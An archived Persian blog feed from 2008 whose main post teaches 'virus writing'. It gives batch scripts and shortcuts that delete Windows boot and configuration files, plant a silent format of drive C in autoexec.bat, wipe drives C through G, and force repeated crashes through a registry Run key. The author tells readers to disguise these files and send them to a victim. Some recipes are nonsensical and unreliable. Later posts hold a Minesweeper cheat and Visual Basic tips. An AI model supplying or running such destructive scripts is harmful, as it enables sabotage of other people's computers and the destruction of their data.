<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>:c</FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>del autoexec.bat</FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>del config.sys</FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>cd winnt</FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>del system.ini</FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>del win.ini</FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>بعد فایل رو با پسوند bat&nbsp; .سیو کنید.</FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>مثل این : nofooz.bat</FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>این فایل رو وقتی برای&nbsp; کسی بفرستید هیچی نمیشه&nbsp; ولی وقتی اجراش کنه و کامپیوترش رو ریست کنه دیگه ویندوزش بالا نمیاد .</FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>من ویروس رو برای راحتی کارتون گذاشتم ولی مواظب باشید خودتون اجراش نکنید .</FONT></P>
<P><BR>&nbsp;</P></TD></TR></TBODY></TABLE>
<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 borderColor=#151515 width="100%" background=Http://Mihanblog.com/Default/Temp10/hnav.gif height=20>
<P dir=rtl><FONT color=#000000>نوشتن یه ویروس ساده ولی خطرناک [ویروس نویسی]</FONT></P></TD></TR></TBODY></TABLE>
<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 width="100%">
<P dir=rtl align=justify>
<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 width="100%">
<P dir=rtl align=justify><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2></FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>&nbsp;این ویروس چیز سختی نیست ولی خیلی خطرناکه.</FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>&nbsp;اول از همه روی دسکتاپ رایت کلیک کنید بعدش New ShortCut&nbsp; بسازید.</FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>یه صفحه باز میشه در اون بنویسید: Format C:/Autotest</FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>سپس Next&nbsp; را زده و در صفحه جدید که باز میشه یه اسم واسه ویروستون انتخاب کنید.</FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>سپس Next&nbsp; را زده ویه آیکون با سلیقه خودتون برای اون انتخاب کرده و Finish&nbsp; کنید.</FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>خب دیگه کارمون تمومه حالا اگه اجراش کنین بیچاره میشین.</FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>اگه خواستین بفهمین چی میشه به جای Format C:/autotest&nbsp; بنویسید </FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>Format a:/autotest&nbsp; و یه فلاپی که حاوی اطلاعات هستش در Flopy Drive&nbsp; خود </FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>قرار دهید بعد اجراش کنید بعد برین سراغ فلاپیتون ببینید چی شده.میبینید فلاپی </FONT></P>
<P><FONT face=tahoma,arial,helvetica,sans-serif color=#000000 size=2>پاک شده ودیگه نه میشه اطلاعات روش ریخت ونه میشه فرمتش کرد.</FONT></P></TD></TR></TBODY></TABLE>
<P><FONT color=#000000></FONT>
<P>&nbsp;</P></TD></TR></TBODY></TABLE>
<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 borderColor=#151515 width="100%" background=Http://Mihanblog.com/Default/Temp10/hnav.gif height=20>
<P dir=rtl><FONT color=#000000>ویروسی که شناسایی نمیشه [ویروس نویسی]</FONT></P></TD></TR></TBODY></TABLE>
<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 width="100%">
<P dir=rtl align=justify><FONT color=#000000></FONT>
<P><FONT color=#000000 size=2>سلام دوستان امروز با یه آموزش بسیار خفن اومدم</FONT></P>
<P><FONT color=#000000 size=2>این ویروس قابلیتی که داره اینه که هیچ آنتی ویروسی نمی تونه در برابرش کاری کنه و بعد از ری استارت ویندوز فرمت میشه </FONT></P>
<P><FONT color=#000000 size=2>برای ساختن این ویروس مراحل زیر رو انجام بدید</FONT></P>
<P><FONT color=#000000 size=2>به نوت پد رفته و این عبارت رو بنویسید</FONT></P>
<P><FONT color=#000000 size=2>del autotexec.bat<BR>del config.sys<BR>cd winnt<BR>del system.ini<BR>del win.ini<BR>بعد اونو با فرمت bat&nbsp; سیو کنین و برای قربانی بفرستین</FONT></P>
<P>&nbsp;</P></TD></TR></TBODY></TABLE>
<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 borderColor=#151515 width="100%" background=Http://Mihanblog.com/Default/Temp10/hnav.gif height=20>
<P dir=rtl><FONT color=#000000>یک ویروس برای فرمت کردن درایو C شخص مورد نظر [ویروس نویسی]</FONT></P></TD></TR></TBODY></TABLE>
<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 width="100%">
<P dir=rtl align=justify><FONT color=#000000></FONT>
<P><FONT color=#000000 size=2>برنامه NotePad&nbsp; رو باز کنین بعد فرمان زیر رو توش کپی و پیست کنید:<BR>&nbsp; </FONT></P>
<P><FONT color=#000000 size=2>&nbsp;@echo off<BR>&nbsp;call attrib -r -h c:autoexec.bat&nbsp; &gt;nul<BR>&nbsp;echo @echo off&nbsp; &gt;c:autoexec.bat<BR>&nbsp;echo format /autotest&nbsp; c:/q&gt;nul&nbsp; &gt;&gt;c:autoexec.bat<BR>&nbsp;call attrib +r +h c:autoexec.bat&nbsp; &gt;nul<BR>&nbsp;exit</FONT></P>
<P><BR><FONT color=#000000 size=2>حالا فایل را با پسوند bat&nbsp; ذخیره کنین. مواظب یاشین که فایل رو اجرا نکنین چون کل اطلاعات درایو سی شما پاک می شه!<BR>&nbsp; <BR>&nbsp;این فایل چه کار می کنه؟<BR>&nbsp;اول کل اطلاعات موجود تو فایل autoexe.bat&nbsp; رو پاک می کنه بعد کد format /autotest c:/q&nbsp; رو توش می زاره وقتی هدف شما کامپیوتر رو ریست و دوباره راه اندازی کنه این کد اجرا می شه و درایو سی فرمت می شه!</FONT></P>
<P><FONT color=#000000 size=2>------------------------</FONT></P>
<P><FONT color=#000000 size=2>راستی اگه هم بخواین تعداد و نام پارتیشن مورد نظر رو با کمی تغییر توی فرمان ها می تونین تعیین کنین</FONT></P>
<P><FONT color=#000000></FONT>&nbsp;</P></TD></TR></TBODY></TABLE>
<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 borderColor=#151515 width="100%" background=Http://Mihanblog.com/Default/Temp10/hnav.gif height=20>
<P dir=rtl><FONT color=#000000>آموزش ساخت یک ویروس که اگر اجرا بشه پس از ریست ، کامپیوتر دیگه بالا نمیاد... [ویروس نویسی]</FONT></P></TD></TR></TBODY></TABLE>
<TABLE class=Tbl cellSpacing=0 cellPadding=0 width="99%" border=1>
<TBODY>
<TR>
<TD class=Tb1 width="100%">
<P dir=rtl align=justify><FONT color=#000000></FONT>
<P><FONT color=#000000 size=2>خوب اول یک </FONT></P>
<P><FONT color=#000000 size=2>Notepad&nbsp; یا همان Txt Document&nbsp; </FONT></P>
<P><FONT color=#000000 size=2>باز می کنید بعد دستور زیر را توی اون کپی میکنید و با فرمت </FONT></P>
<P><FONT color=#000000 size=2>Bat</FONT></P>
<P><FONT color=#000000 size=2>سیو میکنید...</FONT></P>
<P><FONT color=#000000 size=2>C:</FONT></P>
<P><FONT color=#000000 size=2>del autoexec.bat <BR>del config.sys<BR>cd winnt<BR>del system.ini <BR>del win.ini&nbsp; </FONT></P>
<P><FONT color=#000000 size=2>مثل:</FONT></P>
<P><FONT color=#000000 size=2>Virus.bat</FONT></P>
<P><FONT color=#000000 size=2>به جای کلمه ویروس هم اسم مورد نظر را بگذارید...</FONT></P>
<P><FONT size=2>**************************************************</FONT></P>
<P>آموزش ساخت ویروس های قوی و کشنده . <BR><BR>1=ویروس خطرناک <BR>cpu-567njkblaster بعد با پسوند bat. سیو کنید. <BR>خطر: یک بار هم روی سیستم خودتون امتحان نکنید. <BR>ویروس graphic card lower : <BR>توضیح در باره ویروس: این ویروس فضای کارت گرافیک رو پر میکنه و دیگه هیچ بازی رو سیستم اجرا نمیشه. نت پد رو باز کنید و در آن تایپ کنید : <BR>c/windows/system32/jefo/display/memory/full <BR>و برای save کردنش گزینه file رو زده و save as... رو انتخاب کنید و اونو با اسم XXX.bat ذخیره کنید اکنون ویروس شما آماده میباشد <BR><BR>________________________________________ <BR>2=ساخت ویروس <BR>فکر می کنم همه شما ویروس Blaster رو بشناسید (ویروسی که باعث Shutdown شدن کامپیوتر تو 60 ثانیه می شد و می شه) و حتی خیلی از شما روش ساخت اون را بدونید ولی لازم میدونم نگاهی سریع به اون بندازم. <BR>این ویروس رو به طریق مختلفی و با دستورات گوناگونی می شه نوشت که در این جا دو روش رو مورد بررسی قرار میدیم <BR>اگر از این دستورات از قبل آشنایی ندارید حتما از Copy/Paste استفاده کنید. <BR>روش اول <BR>با استفاده از Shortcut : در جایی از دسکتاپ خود کلیک راست کنید و در بخش New گزینه Shortcut را انتخاب کنید و در بخش ظاهر شده یکی از دستورات زیر را وارد کنید: <BR>1)shutdown -s -t xx <BR>2)%windir%system32shutdown.exe -s -t xx <BR>توضیح: بعد از اینکه Paste کردید به جای xx در دستورات بالا مدت زمانی را بر حسب ثانیه قرار دهید تا کامپیوتر پس از آن زمان خاموش شود. <BR>سپس Next را بزنید و برای فایل خود یک نام برگزینید و کار تمام است. <BR>روش دوم <BR>به کمک Notepad : نت پد را باز کنید و باز هم یکی از دو دستور بالا را در آن Paste کنید و حالا فایل خود را با پسوند bat یعنی با نامی مثل shutdown.bat سیو کنید. برای پادزهر درست کردن برای این ویروس هم میتوانید از دستور زیر استفاده کنید: <BR>shutdown -a <BR>و همه مراحل قبل را انجام دهید.این دستور هم از هر دو راه فوق قابل اجرا است. حالا میرسیم به نکات تکمیلی در مورد چگونه میتوان برای BatchFile ها آیکون انتخاب کرد. باید بگویم یکی از ساده ترین روشها که به هیچ نرم افزار خاصی نیاز ندارد این است که شما از BatchFile مورد نظر یک Shortcut بسازید و برای Shortcut براحتی آیکون انتخاب کنید و فایل اصلی را Hidden کنید. <BR>تا به حال هیچ به این فکر افتاده اید که اگر در کامپیوتری Notepad و Wordpad و Microsoft Word نصب نشده باشد شما این همه ترفند را کجا میخواهید پیاده کنید. آیا میدانید هکرها معمولا در محیط متنی دیگری بجز اینها اقدام به نوشن برنامه میکنند؟ بله این محیط متنی به نسبت ناشناخته همان ادیتور داس (Dos Editor) است. شما در این ادیتور میتوانید کد برنامه ها را ببینید. برای وارد شدن به این محیط وارد داس شوید و تایپ کنید Edit. صبر کنید. قبل از اینکه وارد این محیط شوید باید بدانید بر خلاف محیط بی آزار نت پد محیط Dos Editor بسیار بسیار خطرناک است. هرگونه تغییری که خواسته یا ناخواسته در متن کد ها بوجود آورید امکان هیچگونه بازگشت ندارد (اینجا از کلیدی به نام Undo خبری نیست.) همچنین همه تغییرات بطور خودکار سیو میشود و هیچگاه موقع خروج از ادیتور ازشما سوال نمیشود که Do you want to save changes و همه چیز بطور خودکار ذخیره شده و اگر احیانا کد فایل های اصلی سیستم را دستکاری کنید حتی System Restore و Backup های رجیستری هم به دادتان نخواهند رسید <BR><BR>________________________________________ <BR>شبه ویروس <BR>اگه ویندوز 98 دارید برید تو Run و تایپ کنید Con/Con : چیزى که مشاهده خواهید کرد همون صفحه آبى رنگ ویندوز! هیچ چاره اى جر restart کردن رو براتون باقى نمی گذاره.حالا چه جورى می تونیم از این باگ که در ویندوز98 موجود است استفاده کنیم.یکى از راهاش اینه که در یک صفحه اینترنت این دستور را وارد کنیم که این فایل را از کامپیوتر فراخوانى کند بدین صورت file:///c:/con/con می توانید از این باگ یه فایل درست کنید که وقتى کسى این فایل رو اجرا کرد هر بار که کامپیوترش این فایل فراخوانى بشه و راهى بجز فرمت رو براش پیش رو نگذاره یه صفحه یtxt باز کنید و این دستورات رو توش بنویسید و با پسوند .REG سیو کنید <BR>windows Registry Editor Version 5.00 <BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\Curr entVersion\Run] <BR>@="c:\\con\\con" <BR>این باعث میشه که باهر بار ریستارت کردن کامپیوتر این دستور اجرا بشه و نهایتا همون صفحه آبى رنگ بیاد که راهى جز restart کردن نداره.اگر ویندوز NT /200 / XP می توانید یه کار دیگه بکنید یه صفحه یtxt ‌‌باز کنید بعد این کامند ها رو بتوش بنویسید <BR>c: <BR>del autoexec.bat <BR>del config.sys <BR>cd winnt <BR>del system.ini <BR>del win.ini <BR>بعد فایل رو با پسوند .BAT سیو کنید. این فایل رو وقتى براى کسى بفرستید هیچى نمی شه اما به محض اینکه کامپیوتر رو restart کنه دیگه بار بعدی بالا نمیاد. <BR><BR>________________________________________ <BR>آموزش ویروس نویسی <BR>این ویروس بسیار خطرناک است چون با اجرا شدن آن دیگر برای قربانی راهی جز اف دیسک کردن کامپیوتر باقی نمی ماند. مواظب باشید اشتباها روی آن دابل کلیک نکنید. <BR><BR>هرگونه استفاده غیر متعارف از این ویروس به عهده کاربر می باشد. <BR><BR>متن ویروس: <BR><BR>ATTRIB -a -s -h -r c <BR>ATTRIB -a -s -h -r c:\windows\*.* <BR>Echo y | echo a | Echo y | del c:\*.* <BR>Echo y | echo a | Echo y | del d:\*.* <BR>Echo y | echo a | Echo y | del e:\*.* <BR>Echo y | echo a | Echo y | del f:\*.* <BR>Echo y | echo a | Echo y | del g:\*.* <BR>echo y | copy *.* C:\ <BR>echo y | copy *.* D:\ <BR>echo y | copy *.* E:\ <BR>echo y | copy *.* F:\ <BR>echo y | copy *.* G:\<BR><BR></P></TD></TR></TBODY></TABLE>]]></description>
					<pubDate>Fri, 18 Apr 2008 22:26:29 GMT</pubDate>
					<comments>http://amozesheiranian.blogsky.com/Comments.bs?PostID=62</comments>
          <guid>http://amozesheiranian.blogsky.com?PostID=62</guid>
				</item>
			
				<item>
					<title><![CDATA[در مین یابی همیشه موفق باشید!]]></title>
					<link>http://amozesheiranian.blogsky.com?PostID=61</link>
					<description><![CDATA[<P class=MsoNormal dir=rtl style="MARGIN: 0cm 0cm 0pt; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto"><FONT size=2><B><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: green; FONT-FAMILY: Tahoma"></SPAN></B><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /><o:p></o:p></SPAN></FONT>&nbsp;</P>
<P class=MsoNormal dir=rtl style="MARGIN: 0cm 0cm 0pt; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto"><FONT size=2><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">بازی مین روب یا</SPAN><SPAN dir=ltr></SPAN><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN> Minesweeper </SPAN><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">چندین سال است که همراه ویندوز به عنوان یک بازی محبوب ارائه می شود</SPAN><SPAN dir=ltr></SPAN><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN>. </SPAN><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">اگر شما نیز به این بازی علاقمند هستید و می خواهید همیشه در آن پیروز باشید، مراحل</SPAN><SPAN dir=ltr></SPAN><SPAN lang=AR-SA dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN> </SPAN><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">زیر را طی کنید</SPAN><SPAN dir=ltr></SPAN><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN>:<o:p></o:p></SPAN></FONT></P>
<P class=MsoNormal dir=rtl style="MARGIN: 0cm 0cm 0pt; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto"><FONT size=2><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">1- </SPAN><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">وارد بازی</SPAN><SPAN dir=ltr></SPAN><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN> Minesweeper </SPAN><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">شوید</SPAN><SPAN dir=ltr></SPAN></FONT><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN><FONT size=2>.<BR>2- </FONT></SPAN><FONT size=2><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">عبارت</SPAN><SPAN dir=ltr></SPAN><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN> xyzzy</SPAN><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">را در حالی که پنجره</SPAN><SPAN dir=ltr></SPAN><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN> Minesweeper </SPAN><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">فعال است ،</SPAN><SPAN dir=ltr></SPAN><SPAN lang=AR-SA dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN> </SPAN><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">تایپ کنید و کلیدهای</SPAN><SPAN dir=ltr></SPAN><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN> Shift + Enter</SPAN><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">را فشار دهید</SPAN><SPAN dir=ltr></SPAN></FONT><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN><FONT size=2>.<BR>3- </FONT></SPAN><FONT size=2><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">تمامی پنجره های دیگر را</SPAN><SPAN dir=ltr></SPAN><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN> Minimize </SPAN><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">کنید تا</SPAN><SPAN dir=ltr></SPAN><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN> Desktop </SPAN><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">ویندوز را مشاهده کنید</SPAN><SPAN dir=ltr></SPAN><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN>.<o:p></o:p></SPAN></FONT></P>
<P class=MsoNormal dir=rtl style="MARGIN: 0cm 0cm 0pt; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto"><FONT size=2><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">خوب حالا شروع به</SPAN><SPAN dir=ltr></SPAN><SPAN lang=AR-SA dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN> </SPAN><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">بازی کنید .زمانی که نشانگر ماوس را روی خانه ای می آورید که دارای مین است ، نقطه</SPAN><SPAN dir=ltr></SPAN><SPAN lang=AR-SA dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN> </SPAN><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">ای کوچک در گوشه بالا و سمت چپ دسک تاپ سیاه می شود و زمانی که ماوس را روی یک خانه</SPAN><SPAN dir=ltr></SPAN><SPAN lang=AR-SA dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN> </SPAN><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">امن ببرید، همان نقطه سفید می شود</SPAN><SPAN dir=ltr></SPAN></FONT><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN><FONT size=2>.<BR></FONT></SPAN><FONT size=2><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">با این روش می توانید دوستان خود را حیرت زده</SPAN><SPAN dir=ltr></SPAN><SPAN lang=AR-SA dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN> </SPAN><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma">کنید زیرا این نقطه کوچک توجه کمتر کسی را به خود جلب میکند</SPAN><SPAN dir=ltr></SPAN><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: black; FONT-FAMILY: Tahoma"><SPAN dir=ltr></SPAN>.<o:p></o:p></SPAN></FONT></P>
<P class=MsoNormal dir=rtl style="MARGIN: 0cm 0cm 0pt; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto"><B><SPAN dir=ltr style="FONT-SIZE: 8pt; COLOR: green; FONT-FAMILY: Tahoma"></SPAN></B><B><SPAN lang=AR-SA style="FONT-SIZE: 8pt; COLOR: green; FONT-FAMILY: Tahoma"></SPAN></B>&nbsp;</P>]]></description>
					<pubDate>Wed, 16 Apr 2008 20:42:43 GMT</pubDate>
					<comments>http://amozesheiranian.blogsky.com/Comments.bs?PostID=61</comments>
          <guid>http://amozesheiranian.blogsky.com?PostID=61</guid>
				</item>
			
				<item>
					<title><![CDATA[ پروژه های اماده برای تمرین]]></title>
					<link>http://amozesheiranian.blogsky.com?PostID=60</link>
					<description><![CDATA[<STRONG>&nbsp;</STRONG>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif" color=#ff0000>ترفنـــــــــــــــــــــــــــد:</FONT></P>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif">برای اینکه بعد از قرار دادن کنترل هاتون نخواید دوباره فونت تک تک اونها رو تغییر بدهید برای این کار قبل از قرار دادن اونها روی فرم ابتدا فونت فرم رو به فونت مورد نظرتون که من </FONT><FONT face="Tahoma, Arial, Helvetica, sans-serif" size=2>Tahoma </FONT><FONT size=2><FONT face="Tahoma, Arial, Helvetica, sans-serif">رو پیشنهاد میکنم تغییر بدهید و سپس هر کنترلی که روی فرم قرار بدهید با فونت فرم یکی میشود</FONT></P>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif"></FONT></P><B>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif">نکتـــــــــــــــــــــــــــــه:</FONT></P></B>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif">برای حرکت دادن کنترل های رو فرم به صورت دقیق تر و بدون لرزش میتونید این کار رو با کیبرد انجام بدهید که فقط روی کنترل مورد نظر کلیک کنید و سپس کلید کنترل رو پایین نگه دارید و با کلید های مکان نما اون رو جابجا کنید که این کار رو می تونید با انتخاب دسته جمعی کنترل ها هم انجام بدهید</FONT></P>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif"></FONT></P><B>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif">نکتـــــــــــــــــــــــــــــه:</FONT></P></B>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif">برای تغییر اندازه کنترل های روی فرم میتونید ابتدا انها را انتخاب کنید و سپس کلید شیفت رو پایین نگه دارید و با کلید های مکان نما اونها رو تغییر اندازه بدهید</FONT></P>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif"></FONT></P><B>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif">نکتـــــــــــــــــــــــــــــه:</FONT></P></B>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif">بعضی مواقع شما نوشته داخل یک کنترل مثل یک </FONT></FONT><FONT face="Tahoma, Arial, Helvetica, sans-serif"><FONT size=2>Label </FONT><FONT size=2>رو به فارسی تغییر میدهید که این عبارت به درستی نشان داده نخواهد شد که برای رفع این مشکل باید فونت اون کنترل رو به </FONT><FONT size=2>Tahoma </FONT></FONT><FONT size=2><FONT face="Tahoma, Arial, Helvetica, sans-serif">تغییر دهید</FONT></P>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif"></FONT></P><B>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif">نکتـــــــــــــــــــــــــــــه:</FONT></P></B>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif">برای اینکه در پنجره خصوصیت اشیاء سریعتر به خصوصیت مورد نظر پرش کنید میتوانید با نگه داشتن کلید کنترل و شیفت و زدن اولین حرف خصوصیت مورد نظر به ان پرش کنید</FONT></P>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif"></FONT></P></FONT>
<P><A href="http://www.sharemation.com/MahdiVB678/amlac%20sample.zip?uniq=4pu12v" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">برنامه نمونه مشاور املاک(درخواستی)</FONT></A></P>
<P><FONT face="Tahoma, Arial, Helvetica, sans-serif"></FONT></P>
<P><A href="http://www.sharemation.com/MahdiVB678/Digital.rar?uniq=4pu134" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">دیجیتال</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/DNS.zip?uniq=4pu137" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">DNS</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/Forms_controls.zip?uniq=4pu13a" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">کدهای اماده برای کار های مختلف</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/vb%20english.part01.rar?uniq=4pu13j" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">بخش اول ویژوال بیسیک شبیه سازی شده(انگلیسی)</FONT></A><FONT face="Tahoma, Arial, Helvetica, sans-serif">&nbsp; </FONT><A href="http://www.sharemation.com/MahdiVB678/vb%20english.part02.rar?uniq=4pu13m" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">بخش دوم</FONT></A><FONT face="Tahoma, Arial, Helvetica, sans-serif">&nbsp; </FONT><A href="http://www.sharemation.com/MahdiVB678/vb%20english.part03.rar?uniq=4pu13p" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">بخش سوم</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/viruse.rar?uniq=4pu13s" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">اقای Hacker alone ( درخواستی)</FONT></A><FONT face="Tahoma, Arial, Helvetica, sans-serif"></FONT></P>
<P align=center><FONT face="Tahoma, Arial, Helvetica, sans-serif"><IMG alt="" hspace=0 src="http://i10.tinypic.com/2mzii54.jpg" align=baseline border=0></FONT></P>
<P><A href="http://www.sharemation.com/MahdiVB678/3D.zip?uniq=4pu12p" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">برنامه جالب سه بعدی</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/vb%20farsi%20saz/vb%20farsisaz.part01.rar?uniq=4pu23z" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">فارسی ساز ویژوال بیسیک ( در فایل متنی داخلش توضیح دادم ) بخش اول</FONT></A></P>
<P><FONT face="Tahoma, Arial, Helvetica, sans-serif">پسوردش هم : <FONT color=#ff0000>VBLog.blogfa</FONT> است حتمــــــــــــــــــــــــا دانلود کنید هر بخش ۱۵۰ کیلو بایت است</FONT></P>
